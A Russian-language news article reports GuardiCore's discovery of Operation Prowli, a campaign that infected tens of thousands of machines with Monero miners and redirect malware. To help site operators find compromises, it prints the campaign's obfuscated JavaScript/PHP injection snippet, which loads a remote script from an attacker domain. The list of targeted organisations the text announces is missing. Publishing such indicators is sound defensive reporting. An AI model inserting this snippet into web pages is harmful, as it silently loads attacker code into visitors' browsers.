40000 компьютеров по всему миру заражены майнинг-вирусами в ходе Operation Prowli

Новая операция киберпреступников была разоблачена экспертами по компьютерной защите в GuardiCore. Насколько можно судить, десятки тысяч компьютеров заражены майнинг-вирусами и другими вредоносными программами.

Волна атак по всему миру затронула корпоративные компьютеры, у большинства пострадавших были уязвимые данные входа в систему. Использовался метод угадывания простым подбором (брутфорс), а в случае с серверами на Joomla и его дополнении К2 – другая уязвимость, которая позволила хакерам увидеть важную информацию в коде. Диапазон атакованных организаций весьма широк:

Криптовалюта Monero довольно ожидаемо использовалась в наборе инструментов дистанционного майнинга, устанавливаемого через вирус r2r2. Другим источником дохода хакеров являлось перенаправление – пользователи, сами того не желая, видели страницы различных сомнительных веб-сайтов, с которыми криминальная группа предположительно сотрудничает.

До сих пор это самая сложная операция хакеров с использованием удалённого майнинга, появлявшаяся на страницах Bitnewstoday. Из-за большого диапазона методов, которые хакеры использовали для достижения своих целей, способы противостоять действиям криминального синдиката зависят от вашей машины. В случае с r2r вирус может быть удалён антивирусными программами и требуется полная смена паролей. Дело становится сложнее, если речь идёт о серверах или веб-сайтах: администратору сервера требуется проверить трафик на каналы к wp.startreceive[.]tk и stats.startreceive[.]tk/, а оператору веб-сайта – проверить все файлы JavaScript и PHP на наличие следующих кодов.

JavaScript:

eval(String.fromCharCode(118, 97, 114, 32, 122, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 34, 115, 99, 114, 105, 112, 116, 34, 41, 59, 32, 122, 46, 116, 121, 112, 101, 32, 61, 32, 34, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 34, 59, 32, 122, 46, 115, 114, 99, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 115, 116, 97, 116, 115, 46, 115, 116, 97, 114, 116, 114, 101, 99, 101, 105, 118, 101, 46, 116, 107, 47, 115, 99, 114, 105, 112, 116, 46, 106, 115, 63, 100, 114, 61, 49, 34, 59, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 104, 101, 97, 100, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 122, 41, 59));

PHP:

<script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 122, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 34, 115, 99, 114, 105, 112, 116, 34, 41, 59, 32, 122, 46, 116, 121, 112, 101, 32, 61, 32, 34, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 34, 59, 32, 122, 46, 115, 114, 99, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 115, 116, 97, 116, 115, 46, 115, 116, 97, 114, 116, 114, 101, 99, 101, 105, 118, 101, 46, 116, 107, 47, 115, 99, 114, 105, 112, 116, 46, 106, 115, 63, 100, 114, 61, 49, 34, 59, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 104, 101, 97, 100, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 122, 41, 59));</script>

Image: altcointoday.com